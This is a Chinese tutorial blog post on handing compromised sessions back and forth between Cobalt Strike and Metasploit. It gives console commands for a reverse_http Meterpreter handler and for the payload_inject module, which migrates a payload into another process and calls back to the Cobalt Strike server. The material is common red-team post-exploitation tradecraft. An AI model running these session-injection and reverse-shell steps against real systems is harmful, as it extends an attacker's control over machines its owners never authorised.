cobalt strike(CS)与Metasploit(MSF)联动

CS —> MSF

首先cs上创建一个http的外部监听器。

此时在CS服务端查看监听的ip,发现并没有开启,需要到成功移交会话后才会启动。

netstat -tunlp | grep 7000

在MSF中使用handler模块,配置监听。

注意:目标机器的地址是rhost,本地机器的地址是lhost。

msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
msf6 exploit(multi/handler) > set lhost 192.168.0.128
lhost => 192.168.0.128
msf6 exploit(multi/handler) > set lport 7000
lport => 7000
msf6 exploit(multi/handler) > run

[*] Started HTTP reverse handler on http://192.168.0.128:7000

此时在对应的想进行移交的交互会话内执行下面命令即可成功移交。

MSF成功监听到会话。

此时再次查看监听器所配置的端口,即可看到已经启动。

netstat -tunlp | grep 7000

MSF —> CS

首先在CS内创建监听器。

​将session放在后台,然后配置payloads_inject模块。

background
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http   # 和CS的监听器要一致
set lhost 192.168.0.128   # CS服务端IP
set lport 6669       # CS客户端配置的监听器的端口号
set DisablePayloadHandler True   #禁用MSF自动启动payload handler,因为要用在CS内手动启动的handler。
set PrependMigrate True    #在payload执行前自动迁移到另一个进程,以提高稳定性。
set session 2  # 会话id
run

此时可以看到CS内成功监听到了会话。

评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

ranzi.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值